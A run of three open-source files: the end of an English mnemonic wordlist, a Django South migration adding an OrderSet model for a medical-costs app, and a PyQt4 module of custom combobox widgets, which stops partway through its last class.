'canvas',
'canyon',
'capable',
'capital',
'captain',
'car',
'carbon',
'card',
'cargo',
'carpet',
'carry',
'cart',
'case',
'cash',
'casino',
'castle',
'casual',
'cat',
'catalog',
'catch',
'category',
'cattle',
'caught',
'cause',
'caution',
'cave',
'ceiling',
'celery',
'cement',
'census',
'century',
'cereal',
'certain',
'chair',
'chalk',
'champion',
'change',
'chaos',
'chapter',
'charge',
'chase',
'chat',
'cheap',
'check',
'cheese',
'chef',
'cherry',
'chest',
'chicken',
'chief',
'child',
'chimney',
'choice',
'choose',
'chronic',
'chuckle',
'chunk',
'churn',
'cigar',
'cinnamon',
'circle',
'citizen',
'city',
'civil',
'claim',
'clap',
'clarify',
'claw',
'clay',
'clean',
'clerk',
'clever',
'click',
'client',
'cliff',
'climb',
'clinic',
'clip',
'clock',
'clog',
'close',
'cloth',
'cloud',
'clown',
'club',
'clump',
'cluster',
'clutch',
'coach',
'coast',
'coconut',
'code',
'coffee',
'coil',
'coin',
'collect',
'color',
'column',
'combine',
'come',
'comfort',
'comic',
'common',
'company',
'concert',
'conduct',
'confirm',
'congress',
'connect',
'consider',
'control',
'convince',
'cook',
'cool',
'copper',
'copy',
'coral',
'core',
'corn',
'correct',
'cost',
'cotton',
'couch',
'country',
'couple',
'course',
'cousin',
'cover',
'coyote',
'crack',
'cradle',
'craft',
'cram',
'crane',
'crash',
'crater',
'crawl',
'crazy',
'cream',
'credit',
'creek',
'crew',
'cricket',
'crime',
'crisp',
'critic',
'crop',
'cross',
'crouch',
'crowd',
'crucial',
'cruel',
'cruise',
'crumble',
'crunch',
'crush',
'cry',
'crystal',
'cube',
'culture',
'cup',
'cupboard',
'curious',
'current',
'curtain',
'curve',
'cushion',
'custom',
'cute',
'cycle',
'dad',
'damage',
'damp',
'dance',
'danger',
'daring',
'dash',
'daughter',
'dawn',
'day',
'deal',
'debate',
'debris',
'decade',
'december',
'decide',
'decline',
'decorate',
'decrease',
'deer',
'defense',
'define',
'defy',
'degree',
'delay',
'deliver',
'demand',
'demise',
'denial',
'dentist',
'deny',
'depart',
'depend',
'deposit',
'depth',
'deputy',
'derive',
'describe',
'desert',
'design',
'desk',
'despair',
'destroy',
'detail',
'detect',
'develop',
'device',
'devote',
'diagram',
'dial',
'diamond',
'diary',
'dice',
'diesel',
'diet',
'differ',
'digital',
'dignity',
'dilemma',
'dinner',
'dinosaur',
'direct',
'dirt',
'disagree',
'discover',
'disease',
'dish',
'dismiss',
'disorder',
'display',
'distance',
'divert',
'divide',
'divorce',
'dizzy',
'doctor',
'document',
'dog',
'doll',
'dolphin',
'domain',
'donate',
'donkey',
'donor',
'door',
'dose',
'double',
'dove',
'draft',
'dragon',
'drama',
'drastic',
'draw',
'dream',
'dress',
'drift',
'drill',
'drink',
'drip',
'drive',
'drop',
'drum',
'dry',
'duck',
'dumb',
'dune',
'during',
'dust',
'dutch',
'duty',
'dwarf',
'dynamic',
'eager',
'eagle',
'early',
'earn',
'earth',
'easily',
'east',
'easy',
'echo',
'ecology',
'economy',
'edge',
'edit',
'educate',
'effort',
'egg',
'eight',
'either',
'elbow',
'elder',
'electric',
'elegant',
'element',
'elephant',
'elevator',
'elite',
'else',
'embark',
'embody',
'embrace',
'emerge',
'emotion',
'employ',
'empower',
'empty',
'enable',
'enact',
'end',
'endless',
'endorse',
'enemy',
'energy',
'enforce',
'engage',
'engine',
'enhance',
'enjoy',
'enlist',
'enough',
'enrich',
'enroll',
'ensure',
'enter',
'entire',
'entry',
'envelope',
'episode',
'equal',
'equip',
'era',
'erase',
'erode',
'erosion',
'error',
'erupt',
'escape',
'essay',
'essence',
'estate',
'eternal',
'ethics',
'evidence',
'evil',
'evoke',
'evolve',
'exact',
'example',
'excess',
'exchange',
'excite',
'exclude',
'excuse',
'execute',
'exercise',
'exhaust',
'exhibit',
'exile',
'exist',
'exit',
'exotic',
'expand',
'expect',
'expire',
'explain',
'expose',
'express',
'extend',
'extra',
'eye',
'eyebrow',
'fabric',
'face',
'faculty',
'fade',
'faint',
'faith',
'fall',
'false',
'fame',
'family',
'famous',
'fan',
'fancy',
'fantasy',
'farm',
'fashion',
'fat',
'fatal',
'father',
'fatigue',
'fault',
'favorite',
'feature',
'february',
'federal',
'fee',
'feed',
'feel',
'female',
'fence',
'festival',
'fetch',
'fever',
'few',
'fiber',
'fiction',
'field',
'figure',
'file',
'film',
'filter',
'final',
'find',
'fine',
'finger',
'finish',
'fire',
'firm',
'first',
'fiscal',
'fish',
'fit',
'fitness',
'fix',
'flag',
'flame',
'flash',
'flat',
'flavor',
'flee',
'flight',
'flip',
'float',
'flock',
'floor',
'flower',
'fluid',
'flush',
'fly',
'foam',
'focus',
'fog',
'foil',
'fold',
'follow',
'food',
'foot',
'force',
'forest',
'forget',
'fork',
'fortune',
'forum',
'forward',
'fossil',
'foster',
'found',
'fox',
'fragile',
'frame',
'frequent',
'fresh',
'friend',
'fringe',
'frog',
'front',
'frost',
'frown',
'frozen',
'fruit',
'fuel',
'fun',
'funny',
'furnace',
'fury',
'future',
'gadget',
'gain',
'galaxy',
'gallery',
'game',
'gap',
'garage',
'garbage',
'garden',
'garlic',
'garment',
'gas',
'gasp',
'gate',
'gather',
'gauge',
'gaze',
'general',
'genius',
'genre',
'gentle',
'genuine',
'gesture',
'ghost',
'giant',
'gift',
'giggle',
'ginger',
'giraffe',
'girl',
'give',
'glad',
'glance',
'glare',
'glass',
'glide',
'glimpse',
'globe',
'gloom',
'glory',
'glove',
'glow',
'glue',
'goat',
'goddess',
'gold',
'good',
'goose',
'gorilla',
'gospel',
'gossip',
'govern',
'gown',
'grab',
'grace',
'grain',
'grant',
'grape',
'grass',
'gravity',
'great',
'green',
'grid',
'grief',
'grit',
'grocery',
'group',
'grow',
'grunt',
'guard',
'guess',
'guide',
'guilt',
'guitar',
'gun',
'gym',
'habit',
'hair',
'half',
'hammer',
'hamster',
'hand',
'happy',
'harbor',
'hard',
'harsh',
'harvest',
'hat',
'have',
'hawk',
'hazard',
'head',
'health',
'heart',
'heavy',
'hedgehog',
'height',
'hello',
'helmet',
'help',
'hen',
'hero',
'hidden',
'high',
'hill',
'hint',
'hip',
'hire',
'history',
'hobby',
'hockey',
'hold',
'hole',
'holiday',
'hollow',
'home',
'honey',
'hood',
'hope',
'horn',
'horror',
'horse',
'hospital',
'host',
'hotel',
'hour',
'hover',
'hub',
'huge',
'human',
'humble',
'humor',
'hundred',
'hungry',
'hunt',
'hurdle',
'hurry',
'hurt',
'husband',
'hybrid',
'ice',
'icon',
'idea',
'identify',
'idle',
'ignore',
'ill',
'illegal',
'illness',
'image',
'imitate',
'immense',
'immune',
'impact',
'impose',
'improve',
'impulse',
'inch',
'include',
'income',
'increase',
'index',
'indicate',
'indoor',
'industry',
'infant',
'inflict',
'inform',
'inhale',
'inherit',
'initial',
'inject',
'injury',
'inmate',
'inner',
'innocent',
'input',
'inquiry',
'insane',
'insect',
'inside',
'inspire',
'install',
'intact',
'interest',
'into',
'invest',
'invite',
'involve',
'iron',
'island',
'isolate',
'issue',
'item',
'ivory',
'jacket',
'jaguar',
'jar',
'jazz',
'jealous',
'jeans',
'jelly',
'jewel',
'job',
'join',
'joke',
'journey',
'joy',
'judge',
'juice',
'jump',
'jungle',
'junior',
'junk',
'just',
'kangaroo',
'keen',
'keep',
'ketchup',
'key',
'kick',
'kid',
'kidney',
'kind',
'kingdom',
'kiss',
'kit',
'kitchen',
'kite',
'kitten',
'kiwi',
'knee',
'knife',
'knock',
'know',
'lab',
'label',
'labor',
'ladder',
'lady',
'lake',
'lamp',
'language',
'laptop',
'large',
'later',
'latin',
'laugh',
'laundry',
'lava',
'law',
'lawn',
'lawsuit',
'layer',
'lazy',
'leader',
'leaf',
'learn',
'leave',
'lecture',
'left',
'leg',
'legal',
'legend',
'leisure',
'lemon',
'lend',
'length',
'lens',
'leopard',
'lesson',
'letter',
'level',
'liar',
'liberty',
'library',
'license',
'life',
'lift',
'light',
'like',
'limb',
'limit',
'link',
'lion',
'liquid',
'list',
'little',
'live',
'lizard',
'load',
'loan',
'lobster',
'local',
'lock',
'logic',
'lonely',
'long',
'loop',
'lottery',
'loud',
'lounge',
'love',
'loyal',
'lucky',
'luggage',
'lumber',
'lunar',
'lunch',
'luxury',
'lyrics',
'machine',
'mad',
'magic',
'magnet',
'maid',
'mail',
'main',
'major',
'make',
'mammal',
'man',
'manage',
'mandate',
'mango',
'mansion',
'manual',
'maple',
'marble',
'march',
'margin',
'marine',
'market',
'marriage',
'mask',
'mass',
'master',
'match',
'material',
'math',
'matrix',
'matter',
'maximum',
'maze',
'meadow',
'mean',
'measure',
'meat',
'mechanic',
'medal',
'media',
'melody',
'melt',
'member',
'memory',
'mention',
'menu',
'mercy',
'merge',
'merit',
'merry',
'mesh',
'message',
'metal',
'method',
'middle',
'midnight',
'milk',
'million',
'mimic',
'mind',
'minimum',
'minor',
'minute',
'miracle',
'mirror',
'misery',
'miss',
'mistake',
'mix',
'mixed',
'mixture',
'mobile',
'model',
'modify',
'mom',
'moment',
'monitor',
'monkey',
'monster',
'month',
'moon',
'moral',
'more',
'morning',
'mosquito',
'mother',
'motion',
'motor',
'mountain',
'mouse',
'move',
'movie',
'much',
'muffin',
'mule',
'multiply',
'muscle',
'museum',
'mushroom',
'music',
'must',
'mutual',
'myself',
'mystery',
'myth',
'naive',
'name',
'napkin',
'narrow',
'nasty',
'nation',
'nature',
'near',
'neck',
'need',
'negative',
'neglect',
'neither',
'nephew',
'nerve',
'nest',
'net',
'network',
'neutral',
'never',
'news',
'next',
'nice',
'night',
'noble',
'noise',
'nominee',
'noodle',
'normal',
'north',
'nose',
'notable',
'note',
'nothing',
'notice',
'novel',
'now',
'nuclear',
'number',
'nurse',
'nut',
'oak',
'obey',
'object',
'oblige',
'obscure',
'observe',
'obtain',
'obvious',
'occur',
'ocean',
'october',
'odor',
'off',
'offer',
'office',
'often',
'oil',
'okay',
'old',
'olive',
'olympic',
'omit',
'once',
'one',
'onion',
'online',
'only',
'open',
'opera',
'opinion',
'oppose',
'option',
'orange',
'orbit',
'orchard',
'order',
'ordinary',
'organ',
'orient',
'original',
'orphan',
'ostrich',
'other',
'outdoor',
'outer',
'output',
'outside',
'oval',
'oven',
'over',
'own',
'owner',
'oxygen',
'oyster',
'ozone',
'pact',
'paddle',
'page',
'pair',
'palace',
'palm',
'panda',
'panel',
'panic',
'panther',
'paper',
'parade',
'parent',
'park',
'parrot',
'party',
'pass',
'patch',
'path',
'patient',
'patrol',
'pattern',
'pause',
'pave',
'payment',
'peace',
'peanut',
'pear',
'peasant',
'pelican',
'pen',
'penalty',
'pencil',
'people',
'pepper',
'perfect',
'permit',
'person',
'pet',
'phone',
'photo',
'phrase',
'physical',
'piano',
'picnic',
'picture',
'piece',
'pig',
'pigeon',
'pill',
'pilot',
'pink',
'pioneer',
'pipe',
'pistol',
'pitch',
'pizza',
'place',
'planet',
'plastic',
'plate',
'play',
'please',
'pledge',
'pluck',
'plug',
'plunge',
'poem',
'poet',
'point',
'polar',
'pole',
'police',
'pond',
'pony',
'pool',
'popular',
'portion',
'position',
'possible',
'post',
'potato',
'pottery',
'poverty',
'powder',
'power',
'practice',
'praise',
'predict',
'prefer',
'prepare',
'present',
'pretty',
'prevent',
'price',
'pride',
'primary',
'print',
'priority',
'prison',
'private',
'prize',
'problem',
'process',
'produce',
'profit',
'program',
'project',
'promote',
'proof',
'property',
'prosper',
'protect',
'proud',
'provide',
'public',
'pudding',
'pull',
'pulp',
'pulse',
'pumpkin',
'punch',
'pupil',
'puppy',
'purchase',
'purity',
'purpose',
'purse',
'push',
'put',
'puzzle',
'pyramid',
'quality',
'quantum',
'quarter',
'question',
'quick',
'quit',
'quiz',
'quote',
'rabbit',
'raccoon',
'race',
'rack',
'radar',
'radio',
'rail',
'rain',
'raise',
'rally',
'ramp',
'ranch',
'random',
'range',
'rapid',
'rare',
'rate',
'rather',
'raven',
'raw',
'razor',
'ready',
'real',
'reason',
'rebel',
'rebuild',
'recall',
'receive',
'recipe',
'record',
'recycle',
'reduce',
'reflect',
'reform',
'refuse',
'region',
'regret',
'regular',
'reject',
'relax',
'release',
'relief',
'rely',
'remain',
'remember',
'remind',
'remove',
'render',
'renew',
'rent',
'reopen',
'repair',
'repeat',
'replace',
'report',
'require',
'rescue',
'resemble',
'resist',
'resource',
'response',
'result',
'retire',
'retreat',
'return',
'reunion',
'reveal',
'review',
'reward',
'rhythm',
'rib',
'ribbon',
'rice',
'rich',
'ride',
'ridge',
'rifle',
'right',
'rigid',
'ring',
'riot',
'ripple',
'risk',
'ritual',
'rival',
'river',
'road',
'roast',
'robot',
'robust',
'rocket',
'romance',
'roof',
'rookie',
'room',
'rose',
'rotate',
'rough',
'round',
'route',
'royal',
'rubber',
'rude',
'rug',
'rule',
'run',
'runway',
'rural',
'sad',
'saddle',
'sadness',
'safe',
'sail',
'salad',
'salmon',
'salon',
'salt',
'salute',
'same',
'sample',
'sand',
'satisfy',
'satoshi',
'sauce',
'sausage',
'save',
'say',
'scale',
'scan',
'scare',
'scatter',
'scene',
'scheme',
'school',
'science',
'scissors',
'scorpion',
'scout',
'scrap',
'screen',
'script',
'scrub',
'sea',
'search',
'season',
'seat',
'second',
'secret',
'section',
'security',
'seed',
'seek',
'segment',
'select',
'sell',
'seminar',
'senior',
'sense',
'sentence',
'series',
'service',
'session',
'settle',
'setup',
'seven',
'shadow',
'shaft',
'shallow',
'share',
'shed',
'shell',
'sheriff',
'shield',
'shift',
'shine',
'ship',
'shiver',
'shock',
'shoe',
'shoot',
'shop',
'short',
'shoulder',
'shove',
'shrimp',
'shrug',
'shuffle',
'shy',
'sibling',
'sick',
'side',
'siege',
'sight',
'sign',
'silent',
'silk',
'silly',
'silver',
'similar',
'simple',
'since',
'sing',
'siren',
'sister',
'situate',
'six',
'size',
'skate',
'sketch',
'ski',
'skill',
'skin',
'skirt',
'skull',
'slab',
'slam',
'sleep',
'slender',
'slice',
'slide',
'slight',
'slim',
'slogan',
'slot',
'slow',
'slush',
'small',
'smart',
'smile',
'smoke',
'smooth',
'snack',
'snake',
'snap',
'sniff',
'snow',
'soap',
'soccer',
'social',
'sock',
'soda',
'soft',
'solar',
'soldier',
'solid',
'solution',
'solve',
'someone',
'song',
'soon',
'sorry',
'sort',
'soul',
'sound',
'soup',
'source',
'south',
'space',
'spare',
'spatial',
'spawn',
'speak',
'special',
'speed',
'spell',
'spend',
'sphere',
'spice',
'spider',
'spike',
'spin',
'spirit',
'split',
'spoil',
'sponsor',
'spoon',
'sport',
'spot',
'spray',
'spread',
'spring',
'spy',
'square',
'squeeze',
'squirrel',
'stable',
'stadium',
'staff',
'stage',
'stairs',
'stamp',
'stand',
'start',
'state',
'stay',
'steak',
'steel',
'stem',
'step',
'stereo',
'stick',
'still',
'sting',
'stock',
'stomach',
'stone',
'stool',
'story',
'stove',
'strategy',
'street',
'strike',
'strong',
'struggle',
'student',
'stuff',
'stumble',
'style',
'subject',
'submit',
'subway',
'success',
'such',
'sudden',
'suffer',
'sugar',
'suggest',
'suit',
'summer',
'sun',
'sunny',
'sunset',
'super',
'supply',
'supreme',
'sure',
'surface',
'surge',
'surprise',
'surround',
'survey',
'suspect',
'sustain',
'swallow',
'swamp',
'swap',
'swarm',
'swear',
'sweet',
'swift',
'swim',
'swing',
'switch',
'sword',
'symbol',
'symptom',
'syrup',
'system',
'table',
'tackle',
'tag',
'tail',
'talent',
'talk',
'tank',
'tape',
'target',
'task',
'taste',
'tattoo',
'taxi',
'teach',
'team',
'tell',
'ten',
'tenant',
'tennis',
'tent',
'term',
'test',
'text',
'thank',
'that',
'theme',
'then',
'theory',
'there',
'they',
'thing',
'this',
'thought',
'three',
'thrive',
'throw',
'thumb',
'thunder',
'ticket',
'tide',
'tiger',
'tilt',
'timber',
'time',
'tiny',
'tip',
'tired',
'tissue',
'title',
'toast',
'tobacco',
'today',
'toddler',
'toe',
'together',
'toilet',
'token',
'tomato',
'tomorrow',
'tone',
'tongue',
'tonight',
'tool',
'tooth',
'top',
'topic',
'topple',
'torch',
'tornado',
'tortoise',
'toss',
'total',
'tourist',
'toward',
'tower',
'town',
'toy',
'track',
'trade',
'traffic',
'tragic',
'train',
'transfer',
'trap',
'trash',
'travel',
'tray',
'treat',
'tree',
'trend',
'trial',
'tribe',
'trick',
'trigger',
'trim',
'trip',
'trophy',
'trouble',
'truck',
'true',
'truly',
'trumpet',
'trust',
'truth',
'try',
'tube',
'tuition',
'tumble',
'tuna',
'tunnel',
'turkey',
'turn',
'turtle',
'twelve',
'twenty',
'twice',
'twin',
'twist',
'two',
'type',
'typical',
'ugly',
'umbrella',
'unable',
'unaware',
'uncle',
'uncover',
'under',
'undo',
'unfair',
'unfold',
'unhappy',
'uniform',
'unique',
'unit',
'universe',
'unknown',
'unlock',
'until',
'unusual',
'unveil',
'update',
'upgrade',
'uphold',
'upon',
'upper',
'upset',
'urban',
'urge',
'usage',
'use',
'used',
'useful',
'useless',
'usual',
'utility',
'vacant',
'vacuum',
'vague',
'valid',
'valley',
'valve',
'van',
'vanish',
'vapor',
'various',
'vast',
'vault',
'vehicle',
'velvet',
'vendor',
'venture',
'venue',
'verb',
'verify',
'version',
'very',
'vessel',
'veteran',
'viable',
'vibrant',
'vicious',
'victory',
'video',
'view',
'village',
'vintage',
'violin',
'virtual',
'virus',
'visa',
'visit',
'visual',
'vital',
'vivid',
'vocal',
'voice',
'void',
'volcano',
'volume',
'vote',
'voyage',
'wage',
'wagon',
'wait',
'walk',
'wall',
'walnut',
'want',
'warfare',
'warm',
'warrior',
'wash',
'wasp',
'waste',
'water',
'wave',
'way',
'wealth',
'weapon',
'wear',
'weasel',
'weather',
'web',
'wedding',
'weekend',
'weird',
'welcome',
'west',
'wet',
'whale',
'what',
'wheat',
'wheel',
'when',
'where',
'whip',
'whisper',
'wide',
'width',
'wife',
'wild',
'will',
'win',
'window',
'wine',
'wing',
'wink',
'winner',
'winter',
'wire',
'wisdom',
'wise',
'wish',
'witness',
'wolf',
'woman',
'wonder',
'wood',
'wool',
'word',
'work',
'world',
'worry',
'worth',
'wrap',
'wreck',
'wrestle',
'wrist',
'write',
'wrong',
'yard',
'year',
'yellow',
'you',
'young',
'youth',
'zebra',
'zero',
'zone',
'zoo'
]
| lbryio/lbry | torba/torba/client/words/english.py | Python | mit | 19,271 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply the migration: create the 'OrderSet' table and the
        OrderSet<->RVU many-to-many join table."""
        # Adding model 'OrderSet'
        db.create_table(u'costs_orderset', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['myuser.MyUser'], null=True, blank=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=250)),
        ))
        db.send_create_signal(u'costs', ['OrderSet'])
        # Adding M2M table for field RVUs on 'OrderSet'
        # (South shortens the name if it exceeds the backend's limit)
        m2m_table_name = db.shorten_name(u'costs_orderset_RVUs')
        db.create_table(m2m_table_name, (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('orderset', models.ForeignKey(orm[u'costs.orderset'], null=False)),
            ('rvu', models.ForeignKey(orm[u'costs.rvu'], null=False))
        ))
        db.create_unique(m2m_table_name, ['orderset_id', 'rvu_id'])
    def backwards(self, orm):
        """Reverse the migration: drop the 'OrderSet' table and its
        RVUs many-to-many join table."""
        # Deleting model 'OrderSet'
        db.delete_table(u'costs_orderset')
        # Removing M2M table for field RVUs on 'OrderSet'
        db.delete_table(db.shorten_name(u'costs_orderset_RVUs'))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'costs.gpci': {
'Meta': {'unique_together': "(('year', 'location'),)", 'object_name': 'GPCI'},
'facility': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'malpractice': ('django.db.models.fields.FloatField', [], {}),
'work': ('django.db.models.fields.FloatField', [], {}),
'year': ('django.db.models.fields.PositiveSmallIntegerField', [], {})
},
u'costs.medicarefactor': {
'Meta': {'object_name': 'MedicareFactor'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {}),
'year': ('django.db.models.fields.PositiveSmallIntegerField', [], {'unique': 'True'})
},
u'costs.orderset': {
'Meta': {'object_name': 'OrderSet'},
'RVUs': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['costs.RVU']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['myuser.MyUser']", 'null': 'True', 'blank': 'True'})
},
u'costs.rvu': {
'Meta': {'unique_together': "(('year', 'code', 'mod'),)", 'object_name': 'RVU'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'description': ('django.db.models.fields.TextField', [], {}),
'facility': ('django.db.models.fields.FloatField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'malpractice': ('django.db.models.fields.FloatField', [], {}),
'mod': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'work': ('django.db.models.fields.FloatField', [], {}),
'year': ('django.db.models.fields.PositiveSmallIntegerField', [], {})
},
u'myuser.myuser': {
'Meta': {'ordering': "('last_name',)", 'object_name': 'MyUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254', 'db_index': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"})
}
}
complete_apps = ['costs'] | shapiromatron/comp523-medcosts | costs/migrations/0003_auto__add_orderset.py | Python | mit | 6,803 |
# -*- coding: utf-8 -*-
#
# Copyright © 2009-2010 Pierre Raybaut
# Licensed under the terms of the MIT License
# (see spyderlib/__init__.py for details)
"""Customized combobox widgets"""
# pylint: disable=C0103
# pylint: disable=R0903
# pylint: disable=R0911
# pylint: disable=R0201
from PyQt4.QtGui import (QComboBox, QFont, QToolTip, QSizePolicy,
QCompleter)
from PyQt4.QtCore import SIGNAL, Qt, QUrl, QTimer
import os.path as osp
# Local imports
from SMlib.configs.baseconfig import _
class BaseComboBox(QComboBox):
    """Editable combo box base class.

    Subclasses override is_valid() (and usually selected()) to get an
    editable combo with enter-to-validate behaviour and a history of
    previously entered values.
    """
    def __init__(self, parent):
        QComboBox.__init__(self, parent)
        self.setEditable(True)
        self.setCompleter(QCompleter(self))
    # --- overrides
    def keyPressEvent(self, event):
        """Handle key press events: Enter/Return validates the current text."""
        if event.key() == Qt.Key_Return or event.key() == Qt.Key_Enter:
            if self.add_current_text_if_valid():
                self.selected()
        else:
            QComboBox.keyPressEvent(self, event)
    def focusOutEvent(self, event):
        """Handle focus out event"""
        # Calling asynchronously the 'add_current_text' to avoid crash
        # https://groups.google.com/group/spyderlib/browse_thread/thread/2257abf530e210bd
        QTimer.singleShot(50, self.add_current_text_if_valid)
        QComboBox.focusOutEvent(self, event)
    # --- own methods
    def is_valid(self, qstr):
        """
        Return True if string is valid
        Return None if validation can't be done
        """
        pass
    def selected(self):
        """Action to be executed when a valid item has been selected"""
        self.emit(SIGNAL('valid(bool)'), True)
    def add_text(self, text):
        """Add text to combo box: add a new item if text is not found in
        combo box items"""
        # Remove every existing occurrence so the value appears only once.
        index = self.findText(text)
        while index != -1:
            self.removeItem(index)
            index = self.findText(text)
        self.insertItem(0, text)
        # Keep a single empty item at position 0 and select accordingly.
        index = self.findText('')
        if index != -1:
            self.removeItem(index)
            self.insertItem(0, '')
            if text != '':
                self.setCurrentIndex(1)
            else:
                self.setCurrentIndex(0)
        else:
            self.setCurrentIndex(0)
    def add_current_text(self):
        """Add current text to combo box history (convenient method)"""
        self.add_text(self.currentText())
    def add_current_text_if_valid(self):
        """Add current text to combo box history if valid; return True on
        success (also when validation cannot be done, i.e. is_valid -> None)."""
        valid = self.is_valid(self.currentText())
        if valid or valid is None:
            self.add_current_text()
            return True
class PatternComboBox(BaseComboBox):
    """Search pattern combo box.

    Optionally pre-populated with *items*, with an optional tooltip *tip*;
    by default the dropdown shrinks to its minimum contents length.
    """
    def __init__(self, parent, items=None, tip=None,
                 adjust_to_minimum=True):
        BaseComboBox.__init__(self, parent)
        if adjust_to_minimum:
            self.setSizeAdjustPolicy(QComboBox.AdjustToMinimumContentsLength)
        self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
        if items is not None:
            self.addItems(items)
        if tip is not None:
            self.setToolTip(tip)
class EditableComboBox(BaseComboBox):
    """
    Editable combo box + Validate

    Gives live feedback while typing: bold green text for a valid entry,
    bold red for an invalid one, plus a tooltip, driven by is_valid().
    """
    def __init__(self, parent):
        BaseComboBox.__init__(self, parent)
        self.setSizeAdjustPolicy(QComboBox.AdjustToMinimumContentsLength)
        self.font = QFont()
        # Validate on every edit; on activation validate in "selected" mode.
        self.connect(self, SIGNAL("editTextChanged(QString)"), self.validate)
        self.connect(self, SIGNAL("activated(QString)"),
                     lambda qstr: self.validate(qstr, editing=False))
        self.set_default_style()
        # Tooltip text keyed by validity of the current entry.
        self.tips = {True: _("Press enter to validate this entry"),
                     False: _('This entry is incorrect')}
    def show_tip(self, tip=""):
        """Show tip"""
        QToolTip.showText(self.mapToGlobal(self.pos()), tip, self)
    def set_default_style(self):
        """Set widget style to default"""
        self.font.setBold(False)
        self.setFont(self.font)
        self.setStyleSheet("")
        self.show_tip()
    def selected(self):
        """Action to be executed when a valid item has been selected"""
        BaseComboBox.selected(self)
        self.set_default_style()
    def validate(self, qstr, editing=True):
        """Validate entered text and update colour/tooltip feedback."""
        valid = self.is_valid(qstr)
        if self.hasFocus() and valid is not None:
            self.font.setBold(True)
            self.setFont(self.font)
            if valid:
                self.setStyleSheet("color:rgb(50, 155, 50);")
            else:
                self.setStyleSheet("color:rgb(200, 50, 50);")
            if editing:
                # Combo box text is being modified: invalidate the entry
                self.show_tip(self.tips[valid])
                self.emit(SIGNAL('valid(bool)'), False)
            else:
                # A new item has just been selected
                if valid:
                    self.selected()
                else:
                    self.emit(SIGNAL('valid(bool)'), False)
        else:
            self.set_default_style()
class PathComboBox(EditableComboBox):
    """
    QComboBox handling path locations

    An entry is valid when it names an existing directory; selecting a
    valid entry emits the open_dir(QString) signal.
    """
    def __init__(self, parent, adjust_to_contents=False):
        EditableComboBox.__init__(self, parent)
        if adjust_to_contents:
            self.setSizeAdjustPolicy(QComboBox.AdjustToContents)
        else:
            self.setSizeAdjustPolicy(QComboBox.AdjustToMinimumContentsLength)
            self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
        self.tips = {True: _("Press enter to validate this path"),
                     False: _('This path is incorrect.\n'
                              'Enter a correct directory path,\n'
                              'then press enter to validate')}
    def is_valid(self, qstr=None):
        """Return True if string is an existing directory path."""
        if qstr is None:
            qstr = self.currentText()
        return osp.isdir( unicode(qstr) )
    def selected(self):
        """Action to be executed when a valid item has been selected"""
        EditableComboBox.selected(self)
        self.emit(SIGNAL("open_dir(QString)"), self.currentText())
class UrlComboBox(PathComboBox):
    """
    QComboBox handling urls

    Unlike PathComboBox it does not validate while typing (the
    editTextChanged connection is removed); validity is QUrl-based.
    """
    def __init__(self, parent, adjust_to_contents=False):
        PathComboBox.__init__(self, parent, adjust_to_contents)
